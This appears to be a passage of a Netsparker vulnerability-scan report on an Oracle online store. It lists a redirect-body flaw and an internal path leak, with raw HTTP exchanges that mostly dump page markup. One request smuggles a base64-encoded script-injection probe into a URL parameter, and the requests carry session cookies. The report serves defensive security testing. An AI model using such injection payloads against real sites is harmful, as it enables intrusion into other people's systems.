src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> </tr> </table> </td> </tr> <tr> <td height="1" colspan="2" valign="bottom" align="left"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabL.gif" alt="" border="0"/></td> <td nowrap class="OraTabBarEnabled"> <a class="OraTabBarEnabled" target=_parent href="http://oraclestore.oracle.com/OA_HTML/ibeCCtpSctDspRte.jsp?section=10380&sitex=10145:1298447:US">Home</a> </td> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabR.gif" alt="" border="0"/></td> <td width="1"/> </tr> </table> </td> </tr> <tr> <td align="left" background="/OA_HTML/cabo/images/swan/header-Bg.gif" colspan="2"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8" height="5" /></td> </tr> </table> </td> </tr> </table> </td> </tr></table><form method="get" target=_parent name=searchItemaction="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchResults.jsp"><INPUT TYPE=hidden NAME="cg" value=""><INPUT TYPE=hidden NAME="kw" value=""><INPUT TYPE=hidden NAME="ds" value="0"><INPUT TYPE=hidden NAME="dr" value="50"><INPUT TYPE=hidden NAME="st" value="kw"><INPUT TYPE=hidden NAME="cpg" value="0"> <!-- PREFAB_REF=""--></form><script language="JavaScript"><!--function postSearchItem() { var serIt = document.searchItem; var selIndex = document.common.cg.selectedIndex; serIt.cg.value = document.common.cg.options[selIndex].value; serIt.kw.value = document.common.kw.value; serIt.submit();}//--></script><form name=common onSubmit="postSearchItem();return false;"><table summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody> <tr class="searchBar"> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> <td align="left" valign="middle" nowrap height="25"> <table summary="" border="0" cellspacing="0" cellpadding="0"> <tr> <td valign="middle" nowrap class=prompt> Quick Search </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="cg"><span class="jttinvis"> Quick Search&nbsp;&nbsp;</span></label> <select id="cg" name="cg" class="prompt"> <option value=-200 >All Products <option value=10380>Home </select> </td> <td class="prompt" align="right" nowrap> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="query"><span class="jttinvis"> Keyword(s):</span></label> <INPUT id="query" TYPE="text" size="30" NAME="kw" value=""> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td> <script language="JavaScript"> buttonGen("Go","javascript:postSearchItem()"); </script> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td nowrap> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchAdvForm.jsp?sitex=10145:1298447:US" target=_parent class="searchBarLink"> Advanced Search</a>&nbsp;<a class=searchBarLink target=_parent href="/OA_HTML/ibeCCtpSctDspRte.jsp?section=11365&media=os_g_english_help_search_tool">Help</a> </a> </td> </tr> </table> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> </tr></table></form><a id="TheContent" name="TheContent"></a><table class="contentBG" summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody><!-- 11/11/2008 amaheshw Bug 7502501 --><tr><td colspan=3><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></td></tr><tr><td><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=10></td><td width=100%><NOSCRIPT><table summary="" border=0 cellspacing=0 cellpadding=0> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=5><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=13></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR> <TR> <TD>&nbsp;</TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=OraBGAccentDark> <img alt='' height=32 src="/OA_MEDIA/jtfuwarn.gif" width=32></TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=errorHeader>Error</TD> <TD class=errorMessage><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=20></TD> <TD class=errorMessage width="100%"> <LI>JavaScript is disabled on your browser. JavaScript needs to be turned on for the application to be fully functional. </TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD>&nbsp;</TD> </TR> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=7><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR></table></NOSCRIPT>










<!-- $Header: ibeCAcdProfMenuTop.jsp 120.0 2005/05/30 03:20:10 appldev noship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><!-- ibeCCtdMenu.jsp end --><!-- ibeCZzdMenu.jsp end --><CENTER><span class="pageTitle">Help Desk</span><br></CENTER>










<!-- $Header: misibeCustomHelp.jsp 120.0 2007/05/24 07:44:01 artripat noship $ -->
















<!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end -->
<!-- Begin os_fi_help_index.html -->
<link rel=stylesheet href="jtfucss.css">
<table width="100%" border="0">
<tr>
<td width="28%" valign="top">

<table border="0"..
Redirect Response BODY Is Too Large

Redirect Response BODY Is Too Large
1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified that the response from the page returned an HTTP Redirect Status but output more information than usual. This generally indicates that, after redirect, the page did not finish the response as it was supposed to.

Impact

This can lead to serious issues such as authentication bypass in authentication required pages. In other pages it generally indicates a programming error.

Remedy

Finish the HTTP response after you redirect the user.

In ASP.NET use Response.Redirect("redirected-page.aspx", true); instead of Response.Redirect("redirected-page.aspx", false); In PHP applications call exit(); after you redirect the user.
- /OA_HTML/ibeCCtpSctDspRte.jsp

/OA_HTML/ibeCCtpSctDspRte.jsp CONFIRMED

https://oraclestore.oracle.com/OA_HTML/ibeCCtpSctDspRte.jsp?section=data%3A%3Bbase64%2CJyI%2bPHNjcml..

Parameters

Parameter Type Value
section GET data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTNBKTwvc2NyaXB0Pg==

Request

GET /OA_HTML/ibeCCtpSctDspRte.jsp?section=data%3A%3Bbase64%2CJyI%2bPHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTNBKTwvc2NyaXB0Pg%3d%3d HTTP/1.1
Referer: https://oraclestore.oracle.com/OA_HTML/ibeCCtdMinisites.jsp?language=US&ref=http%3A%2F%2Foraclestore.oracle.com%2FOA_HTML%2FibeCZzpHome.jsp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: oraclestore.oracle.com
Cookie: JSESSIONID=7a35c7e2eee5794721729186d7d44bf1fb9b4f0512eaf379378489f55e44618c.e34Qb38Qax0Obi0La3mQaxaObxuOe0; GSI_pses=ZGC50CF0EE39972D1721DC574CE5ADEAB057E66B1B66F055D8F301C302E227103DDB89F425B4C1B846F4631F9EB11BCF1F; BIGipServergsiap_store_http=1510838925.5150.0000; GSI=xw7XzrhVDfQxPPTRIpSLNd3Y2y
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Moved Temporarily
Location: https://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?ref=http%3A%2F%2Foraclestore.oracle.com%2FOA_HTML%2FibeCCtpSctDspRte.jsp%3Fsection%3Ddata%253A%253Bbase64%252CJyI%252BPHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTNBKTwvc2NyaXB0Pg%253D%253D
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Set-Cookie: JSESSIONID=7a35c7e2eee5794721729186d7d44bf1fb9b4f0512eaf379378489f55e44618c.e34Qb38Qax0Obi0La3mQaxaObxuOe0; path=/OA_HTML; secure
Content-Length: 267
Date: Sun, 11 Sep 2011 17:56:35 GMT


<HTML><HEAD><TITLE>Redirect to https://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?ref=http%3A%2F%2Foraclestore.oracle.com%2FOA_HTML%2FibeCCtpSctDspRte.jsp%3Fsection%3Ddata%253A%253Bbase64%252CJyI%252BPHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTNBKTwvc2NyaXB0Pg%253D%253D</TITLE></HEAD><BODY><A HREF="https://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?ref=http%3A%2F%2Foraclestore.oracle.com%2FOA_HTML%2FibeCCtpSctDspRte.jsp%3Fsection%3Ddata%253A%253Bbase64%252CJyI%252BPHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTNBKTwvc2NyaXB0Pg%253D%253D">https://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?ref=http%3A%2F%2Foraclestore.oracle.com%2FOA_HTML%2FibeCCtpSctDspRte.jsp%3Fsection%3Ddata%253A%253Bbase64%252CJyI%252BPHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTNBKTwvc2NyaXB0Pg%253D%253D</A></BODY></HTML>
[Possible] Internal Path Leakage (Windows)

[Possible] Internal Path Leakage (Windows)
2 TOTAL
INFORMATION
Netsparker identified an internal path in the document.

Impact

There is no direct impact however this information can help an attacker either to identify other vulnerabilities or during the exploitation of other identified vulnerabilities.

Remedy

First ensure that this is not a false positive. Due to the nature of the issue. Netsparker could not confirm that this file path was actually the real file path of the target web server.
  • Error messages should be disabled.
  • Remove this kind of sensitive data from the output.

External References

Classification

PCI v1.2-6.5.6 CWE-200 CAPEC-118 WASC-13
- /OA_HTML/ibeCCtpSctDspRte.jsp

/OA_HTML/ibeCCtpSctDspRte.jsp

http://oraclestore.oracle.com/OA_HTML/ibeCCtpSctDspRte.jsp?section=10381&sitex=10145:1298447:US

Identified Internal Path(s)

F:\html\itcrm\products\eoperations\Store

Request

GET /OA_HTML/ibeCCtpSctDspRte.jsp?section=10381&sitex=10145:1298447:US HTTP/1.1
Referer: http://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp?minisite=10145&respid=1298447&grp=STORE&language=US&GSI=xw7XzrhVDfQxPPTRIpSLNd3Y2y&GSI_pses=ZG58546D7CC88023DFCAD78C33D94F83ED7A0D70952D644BCC5157A841AAB5468E856736C9A89661BEAE2F1B15C4D323B5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: oraclestore.oracle.com
Cookie: JSESSIONID=7a35c7e2eee5794721729186d7d44bf1fb9b4f0512eaf379378489f55e44618c.e34Qb38Qax0Obi0La3mQaxaObxuOe0; BIGipServergsiap_store_http=1510838925.5150.0000; GSI=xw7XzrhVDfQxPPTRIpSLNd3Y2y
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Set-Cookie: JSESSIONID=7a35c7e2eee5794721729186d7d44bf1fb9b4f0512eaf379378489f55e44618c.e34Qb38Qax0Obi0La3mQaxaObxuOe0; path=/OA_HTML; secure,GSI_pses=ZGF841CE4738C1D02DCD51AF7748061A98FF74995F6C416B59BAFB8A1B61B468C818731B6D12BD44E789B52D987DAB9576; expires=Thu, 10-Nov-2011 17:56:35 GMT; path=/OA_HTML
Content-Length: 11495
Date: Sun, 11 Sep 2011 17:56:31 GMT
Content-Location: https://oraclestore.oracle.com/OA_HTML/ibeCCtdCmnSt.jsp






























<!-- $Header: ibeCCtdCmnSt.jsp 120.3.12010000.2 2009/03/02 06:30:51 amaheshw ship $ --><!-- $Header: ibeCZzpHeader.jsp 120.32.12010000.3 2009/03/03 06:43:46 ukalaiah ship $ --><!-- ibeCZzpHeader.jsp end --><!-- $Header: ibeCWcpESIContainer.jsp 120.0 2005/05/30 03:10:04 appldev noship $ --><!-- $Header: ibeCWcpHeader.jsp 120.0 2005/05/30 02:24:25 appldev noship $ --><!-- $Header: ibeCCtpPostingI.jsp 120.0 2005/05/30 02:51:13 appldev noship $ --> <!-- ibeCCtpPostingI.jsp end --><!-- $Header: ibeCZzdTop.jsp 120.2 2005/07/04 04:26:38 appldev ship $ --> <!-- $Header: ibwTrackingHeader.jsp 120.6 2006/01/22 21:55 schittar noship $ -->















<!-- $Header: ibeCCtdTop.jsp 120.7.12010000.6 2010/04/23 07:18:39 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><HTML lang="EN-US"><HEAD> <TITLE> Site:How to Order </TITLE> <link rel=stylesheet href=ibeCStyleSheet.css> <SCRIPT LANGUAGE="JavaScript" SRC="ibeCButton.js"></script> <script LANGUAGE="javascript"> var disableanchorlink= true; var hidedivmouseout= [true, 200]; var formNameSL="null"; var relatedIndex="null"; function getWinOffset(what, offsettype){ return (what.offsetParent)? what[offsettype]+this.getWinOffset(what.offsetParent, offsettype) : what[offsettype]; } function isPopUpExist(m, e){ var e=window.event || e var c=e.relatedTarget || ((e.type=="mouseover")? e.fromElement : e.toElement) while (c && c!=m)try {c=c.parentNode} catch(e){c=m} if (c==m) return true; else return false; } function showSLPopup(anchorobj, subobj, e){ try{ if(isItemPopupOpen()){ closeItemPopup(); } }catch(ex){} formNameSL = anchorobj.getAttribute("formname"); try{ relatedIndex = anchorobj.getAttribute("relindex"); }catch(ex){} try{ document.getElementById('text_cr_shoplist').value='Create Shopping List'; }catch(ex){} try{ document.getElementById('text_cr_shoplist_details').value='Create Shopping List'; }catch(ex){} if (!this.isPopUpExist(anchorobj, e) || (e && e.type=="click")){ var e=window.event || e; if (e.type=="click" && subobj.style.visibility=="visible"){ subobj.style.visibility="hidden"; return; } var subobjtemp; if(formNameSL == 'relatedForm'){ subobjtemp=document.getElementById('tempoffset_related'); } else { subobjtemp=document.getElementById('tempoffset'); } var horizontaloffset=(subobj.dropposition[0]=="left")? -(subobj.offsetWidth-anchorobj.offsetWidth) : 0; var verticaloffset=(subobj.dropposition[1]=="top")? -subobj.offsetHeight : anchorobj.offsetHeight ; subobj.style.left=this.getWinOffset(subobjtemp, "offsetLeft") + horizontaloffset + "px"; subobj.style.top=this.getWinOffset(anchorobj, "offsetTop")+verticaloffset+"px"; subobj.style.clip=(subobj.dropposition[1]=="top")? "rect(auto auto auto 0)" : "rect(0 auto 0 0)"; subobj.style.visibility="visible"; subobj.startTime=new Date().getTime(); subobj.contentheight=parseInt(subobj.offsetHeight); if (typeof window["hidetimer_"+subobj.id]!="undefined") clearTimeout(window["hidetimer_"+subobj.id]); this.slideengine(subobj, (subobj.dropposition[1]=="top")? "up" : "down"); } } function curveincrement(percent){ return (1-Math.cos(percent*Math.PI)) / 2 ; } function slideengine(obj, direction){ var elapsed=new Date().getTime()-obj.startTime; if (elapsed<obj.glidetime){ var distancepercent=(direction=="down")? this.curveincrement(elapsed/obj.glidetime) : 1-this.curveincrement(elapsed/obj.glidetime); var currentclip=(distancepercent*obj.contentheight)+"px"; obj.style.clip=(direction=="down")? "rect(0 auto "+currentclip+" 0)" : "rect("+currentclip+" auto auto 0)"; window["glidetimer_"+obj.id]=setTimeout(function(){slideengine(obj, direction)}, 10); } else{ obj.style.clip="rect(0 auto auto 0)"; } } function hide(activeobj, subobj, e){ if (!isPopUpExist(activeobj, e)){ window["hidetimer_"+subobj.id]=setTimeout(function(){ subobj.style.visibility="hidden" subobj.style.left=subobj.style.top=0 clearTimeout(window["glidetimer_"+subobj.id]) }, hidedivmouseout[1]) } } function initpopup(anchorid, pos, glidetime, revealbehavior){ var anchorobj=document.getElementById(anchorid); var subobj=document.getElementById(anchorobj.getAttribute('rel')); subobj.dropposition=pos.split("-"); subobj.glidetime=glidetime || 1000; subobj.style.left=subobj.style.top=0; if (typeof revealbehavior=='undefined' || revealbehavior=='mouseover'){ anchorobj.onmouseover=function(e){showSLPopup(this, subobj, e)} anchorobj.onmouseout=function(e){hide(subobj, subobj, e)} if (this.disableanchorlink) anchorobj.onclick=function(){return false} } else anchorobj.onclick=function(e){showSLPopup(this, subobj, e); return false} if (this.hidedivmouseout[0]==true) subobj.onmouseout=function(e){hide(this, subobj, e)} }</script> </HEAD><body class="applicationBody"><!-- ibeCCtdTop.jsp end --><!-- ibeCZzdTop.jsp end --><!-- $Header: ibeCZzdMenu.jsp 120.4 2005/09/16 11:44:37 appldev ship $ -->



























<!-- $Header: ibeCCtdMenu.jsp 120.32.12010000.7 2009/06/02 09:02:13 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><a href="#TheContent"><img src="/OA_MEDIA/jtfutrpx.gif" align=right width=1 height=1 alt="Skip navigation elements to page contents" border="0"></a><table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td class="topBG"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td colspan="2" height="10"><img src="/OA_MEDIA/jtfutrpx.gif" alt="" height="10"></td> </tr> <tr><!--- Commented the hardrcoded logo image bug 6794502 <td width="5%" valign="center"> <img src="/OA_MEDIA/FNDSSCORP.gif" alt="" border="0"/> </td>---><td width='5%' valign='center' ><a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=10145:1298447:US"><img src="jtfdload.jsp?fileid=455388252&appName=IBE&sitex=10145:1298447:US" ALT="Site Main Logo" border=0 ></a></td> <td width="95%" valign="bottom" class="applicationName"> &nbsp;&nbsp;Finland </td> </tr> <tr> <td colspan="2" align="right"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Sites</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/misibeCScdViewA.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Cart</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCOtdOrdSumMain.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Orders</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpProfMenuHome.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Profile</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Login</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOReg.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Register</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdHelp.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Help</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> </tr> </table> </td> </tr> <tr> <td height="1" colspan="2" valign="bottom" align="left"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1"><img src="/OA_HTML/cabo/images/swan/topTabL.gif" alt="" border="0"/></td> <td nowrap class="OraTabBarSelected"> <a class="OraTabBarSelected" target=_parent href="http://oraclestore.oracle.com/OA_HTML/ibeCCtpSctDspRte.jsp?section=10380&sitex=10145:1298447:US">Home</a> </td> <td width="1"><img src="/OA_HTML/cabo/images/swan/topTabR.gif" alt="" border="0"/></td> <td width="1"/> </tr> </table> </td> </tr> <tr> <td align="left" background="/OA_HTML/cabo/images/swan/header-Bg.gif" colspan="2"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8" height="5" /></td> <td class="OraNav2Enabled" nowrap> <a class="OraNav2Enabled" target=_parent href="ibeCCtpSctDspRte.jsp?section=10389&sitex=10145:1298447:US">Welcome</a> </td> <td><img src="/OA_HTML/cabo/images/swan/separator.gif" alt ="" border="0"/></td> <td class="OraNav2Selected" nowrap> <a class="OraNav2Selected" target=_parent href="ibeCCtpSctDspRte.jsp?section=10381&sitex=10145:1298447:US">How to Order</a> </td> <td><img src="/OA_HTML/cabo/images/swan/separator.gif" alt ="" border="0"/></td> <td class="OraNav2Enabled" nowrap> <a class="OraNav2Enabled" target=_parent href="ibeCCtpSctDspRte.jsp?section=10388&sitex=10145:1298447:US">Trial Software</a> </td> </tr> </table> </td> </tr> </table> </td> </tr></table><form method="get" target=_parent name=searchItemaction="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchResults.jsp"><INPUT TYPE=hidden NAME="cg" value=""><INPUT TYPE=hidden NAME="kw" value=""><INPUT TYPE=hidden NAME="ds" value="0"><INPUT TYPE=hidden NAME="dr" value="50"><INPUT TYPE=hidden NAME="st" value="kw"><INPUT TYPE=hidden NAME="cpg" value="0"> <!-- PREFAB_REF=""--></form><script language="JavaScript"><!--function postSearchItem() { var serIt = document.searchItem; var selIndex = document.common.cg.selectedIndex; serIt.cg.value = document.common.cg.options[selIndex].value; serIt.kw.value = document.common.kw.value; serIt.submit();}//--></script><form name=common onSubmit="postSearchItem();return false;"><table summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody> <tr class="searchBar"> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> <td align="left" valign="middle" nowrap height="25"> <table summary="" border="0" cellspacing="0" cellpadding="0"> <tr> <td valign="middle" nowrap class=prompt> Quick Search </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="cg"><span class="jttinvis"> Quick Search&nbsp;&nbsp;</span></label> <select id="cg" name="cg" class="prompt"> <option value=-200 >All Products <option value=10380>Home </select> </td> <td class="prompt" align="right" nowrap> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="query"><span class="jttinvis"> Keyword(s):</span></label> <INPUT id="query" TYPE="text" size="30" NAME="kw" value=""> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td> <script language="JavaScript"> buttonGen("Go","javascript:postSearchItem()"); </script> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td nowrap> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchAdvForm.jsp?sitex=10145:1298447:US" target=_parent class="searchBarLink"> Advanced Search</a>&nbsp;<a class=searchBarLink target=_parent href="/OA_HTML/ibeCCtpSctDspRte.jsp?section=11365&media=os_g_english_help_search_tool">Help</a> </a> </td> </tr> </table> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> </tr></table></form><a id="TheContent" name="TheContent"></a><table class="contentBG" summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody><!-- 11/11/2008 amaheshw Bug 7502501 --><tr><td colspan=3><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></td></tr><tr><td><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=10></td><td width=100%><NOSCRIPT><table summary="" border=0 cellspacing=0 cellpadding=0> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=5><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=13></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR> <TR> <TD>&nbsp;</TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=OraBGAccentDark> <img alt='' height=32 src="/OA_MEDIA/jtfuwarn.gif" width=32></TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=errorHeader>Error</TD> <TD class=errorMessage><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=20></TD> <TD class=errorMessage width="100%"> <LI>JavaScript is disabled on your browser. JavaScript needs to be turned on for the application to be fully functional. </TD> <TD class=OraBGAccentDa..
- /OA_HTML/ibeCCtpBuyRoute.jsp

/OA_HTML/ibeCCtpBuyRoute.jsp

http://oraclestore.oracle.com/OA_HTML/ibeCCtpBuyRoute.jsp

Identified Internal Path(s)

F:\html\itcrm\products\eoperations\Store

Request

POST /OA_HTML/ibeCCtpBuyRoute.jsp HTTP/1.1
Referer: http://oraclestore.oracle.com/OA_HTML/ibeCCtpSctDspRte.jsp?section=10381&sitex=10145:1298447:US
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: oraclestore.oracle.com
Cookie: JSESSIONID=43a9f0f2c548cd1b9faf2b73c59ee692606f373547ae59ab7b36b0a67e0e8039.e34QbhaLa3mKbi0La3mQaNePax4Ne0; GSI_pses=ZG5B76819589D7734FDFFDAF47EF00DCB1A1A834F06C86D3CC281C6B9044340B0C911787B9982FF486DE5E92D25019F45E; BIGipServergsiap_store_http=3540882061.5150.0000; GSI=j8Rnjln8bRrxqwuVKOYUAaal5p
Content-Length: 120
Expect: 100-continue
Accept-Encoding: gzip, deflate

refpage=ibeCCtpSctDspRte.jsp%3fsection%3d10381%26beginIndex%3d0&num=%20netsparker(0x001010)%20&tmpx=100&tmpy=100&event=3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Content-Length: 12461
Set-Cookie: JSESSIONID=741894018cb2f4f31646d67ee2592bbafbe35d9223065f062cc9936a0117b4f0.e34Qb38Qax0Obi0La3mQaxaObxuNe0; path=/OA_HTML; secure
Date: Sun, 11 Sep 2011 18:02:09 GMT
Content-Location: https://oraclestore.oracle.com/OA_HTML/ibeCCtdCmnSt.jsp






























<!-- $Header: ibeCCtdCmnSt.jsp 120.3.12010000.2 2009/03/02 06:30:51 amaheshw ship $ --><!-- $Header: ibeCZzpHeader.jsp 120.32.12010000.3 2009/03/03 06:43:46 ukalaiah ship $ --><!-- ibeCZzpHeader.jsp end --><!-- $Header: ibeCWcpESIContainer.jsp 120.0 2005/05/30 03:10:04 appldev noship $ --><!-- $Header: ibeCWcpHeader.jsp 120.0 2005/05/30 02:24:25 appldev noship $ --><!-- $Header: ibeCCtpPostingI.jsp 120.0 2005/05/30 02:51:13 appldev noship $ --> <!-- ibeCCtpPostingI.jsp end --><!-- $Header: ibeCZzdTop.jsp 120.2 2005/07/04 04:26:38 appldev ship $ --> <!-- $Header: ibwTrackingHeader.jsp 120.6 2006/01/22 21:55 schittar noship $ -->















<!-- $Header: ibeCCtdTop.jsp 120.7.12010000.6 2010/04/23 07:18:39 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><HTML lang="EN-US"><HEAD> <TITLE> Site:How to Order </TITLE> <link rel=stylesheet href=ibeCStyleSheet.css> <SCRIPT LANGUAGE="JavaScript" SRC="ibeCButton.js"></script> <script LANGUAGE="javascript"> var disableanchorlink= true; var hidedivmouseout= [true, 200]; var formNameSL="null"; var relatedIndex="null"; function getWinOffset(what, offsettype){ return (what.offsetParent)? what[offsettype]+this.getWinOffset(what.offsetParent, offsettype) : what[offsettype]; } function isPopUpExist(m, e){ var e=window.event || e var c=e.relatedTarget || ((e.type=="mouseover")? e.fromElement : e.toElement) while (c && c!=m)try {c=c.parentNode} catch(e){c=m} if (c==m) return true; else return false; } function showSLPopup(anchorobj, subobj, e){ try{ if(isItemPopupOpen()){ closeItemPopup(); } }catch(ex){} formNameSL = anchorobj.getAttribute("formname"); try{ relatedIndex = anchorobj.getAttribute("relindex"); }catch(ex){} try{ document.getElementById('text_cr_shoplist').value='Create Shopping List'; }catch(ex){} try{ document.getElementById('text_cr_shoplist_details').value='Create Shopping List'; }catch(ex){} if (!this.isPopUpExist(anchorobj, e) || (e && e.type=="click")){ var e=window.event || e; if (e.type=="click" && subobj.style.visibility=="visible"){ subobj.style.visibility="hidden"; return; } var subobjtemp; if(formNameSL == 'relatedForm'){ 